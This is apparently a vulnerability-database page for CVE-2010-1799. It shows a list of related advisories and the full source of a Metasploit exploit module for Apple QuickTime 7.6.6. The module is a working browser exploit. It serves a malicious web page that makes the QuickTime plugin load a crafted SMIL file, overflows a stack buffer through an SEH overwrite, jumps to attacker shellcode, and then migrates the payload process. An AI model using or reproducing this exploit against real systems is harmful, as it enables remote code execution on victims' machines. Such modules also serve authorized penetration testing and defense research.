| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| QuickTime < 7.6.7 QuickTimeStreaming.qtx SMIL File Debug Logging Overflow (Windows) (deprecated) | 13 Aug 201000:00 | – | nessus | |
| QuickTime < 7.6.7 QuickTimeStreaming.qtx SMIL File Debug Logging Overflow (Windows) | 13 Aug 201000:00 | – | nessus | |
| QuickTime < 7.6.7 QuickTimeStreaming.qtx SMIL File Debug Logging Overflow (Windows) | 13 Aug 201000:00 | – | nessus | |
| CVE-2010-1799 | 8 Jan 201100:00 | – | circl | |
| Apple QuickTime Streaming Debug Error Logging Buffer Overflow (CVE-2010-1799) | 29 Aug 201000:00 | – | checkpoint_advisories | |
| CVE-2010-1799 | 16 Aug 201018:25 | – | cve | |
| CVE-2010-1799 | 16 Aug 201018:25 | – | cvelist | |
| Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit) | 8 Jan 201100:00 | – | exploitdb | |
| CVE-2010-1799 | 16 Aug 201018:39 | – | nvd | |
| QuickTime Player Streaming Debug Error Logging Buffer Overflow Vulnerability | 16 Aug 201000:00 | – | openvas |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking # needs more testing/targets to be Great
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => nil,
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Apple QuickTime
7.6.6. When processing a malformed SMIL uri, a stack-based buffer
overflow can occur when logging an error message.
},
'Author' =>
[
'Krystian Kloskowski', # original discovery
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-1799' ],
[ 'OSVDB', '66636'],
[ 'BID', '41962' ],
[ 'URL', 'http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729' ],
[ 'URL', 'http://support.apple.com/kb/HT4290' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{
'Space' => 640, # 716 - 63 - 8 - 5
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
},
'Platform' => 'win',
'Targets' =>
[
#[ 'Automatic', { } ],
[ 'Apple QuickTime Player 7.6.6',
{
'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
}
],
],
'Privileged' => false,
'DisclosureDate' => '2010-08-12',
'DefaultTarget' => 0))
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
print_status("Sending exploit SMIL (target: #{target.name})")
# This is all basically filler on the browser target because we can't
# expect the SEH to be in a reliable place across multiple browsers.
# Heap spray ftw.
off = 716
start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"
scheme = rand_text_alphanumeric(5)
sploit = ''
sploit << scheme
sploit << "://"
# payload
sploit << p.encoded
# pad to SEH
sploit << rand_text_english(off - sploit.length - start.length)
# seh frame
sploit << generate_seh_record(target.ret)
# jmp back to payload
distance = off + 8 - (8 + start.length)
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# force exception while writing
sploit << rand_text(1024) * 15
smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
<body>
<img src="#{sploit}" />
</body>
</smil>
|
send_response(client, smil, { 'Content-Type' => "application/smil" })
else
print_status("Sending initial HTML")
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
content = "<html><body>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.qtl"
QTSRC = "#{url}/#{fname}.qtl"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
send_response(client, content, { 'Content-Type' => "text/html" })
end
# Handle the payload
handler(client)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation